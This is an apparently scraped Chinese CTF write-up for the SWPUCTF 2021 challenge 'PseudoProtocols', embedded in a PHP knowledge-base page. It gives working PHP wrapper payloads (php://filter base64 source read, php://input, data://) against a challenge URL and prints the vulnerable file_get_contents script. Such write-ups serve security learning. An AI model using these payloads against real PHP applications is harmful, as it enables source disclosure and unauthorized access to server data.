[PHP知识库] [SWPUCTF 2021 新生赛]PseudoProtocols

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> [SWPUCTF 2021 新生赛]PseudoProtocols -> 正文阅读

[PHP知识库][SWPUCTF 2021 新生赛]PseudoProtocols

[SWPUCTF 2021 新生赛]PseudoProtocols

一、题目

二、WP

1、打开题目，发现提示我们是否能找到hint.php，并且发现URL有参数wllm。所以我们尝试利用PHP伪协议读取该文件

wllm=php://filter/read/convert.base64-encode/resource=hint.php

2、对输出进行Baes64解码

<?php
//go to /test2222222222222.php
?>

3、访问/test2222222222222.php

 <?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

代码的大概意思是为a参数利用file_get_contents()函数已只读的方式打开，如果内容等于I want flag的话，输出flag。

4、接下来有两种解法

①、php://input

? 此方法需要条件，即开启allow_url_include=On。

? 实际上这相当于一个远程包含的利用。

? php://打开文件流后，我们直接在流里面写入我们的恶意代码，此时包含既可执行代码。

http://1.14.71.254:28463/test2222222222222.php?a=php://input

// 然后在POST里传入I want flag，则成功读取Flag

②、data://

data://本身是数据流封装器，其原理和用法跟php://input类似，但是是发送GET请求参数。

http://1.14.71.254:28463/test2222222222222.php?a=data://text/plain,I want flag

三、考点

PHP伪协议

php://filter
php://input
data://

PHP知识库最新文章

Laravel 下实现 Google 2fa 验证

UUCTF WP

DASCTF10月 web

XAMPP任意命令执行提升权限漏洞（CVE-2020-

[GYCTF2020]Easyphp

iwebsec靶场代码执行关卡通关笔记

多个线程同步执行，多个线程依次执行，多个

php 没事记录下常用方法 (TP5.1)

php之jwt

2021-09-18

加:2022-10-22 20:56:11 更:2022-10-22 20:56:34

360图书馆购物三丰科技阅读网日历万年历 2024年11日历

-2024/11/22 18:59:39-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码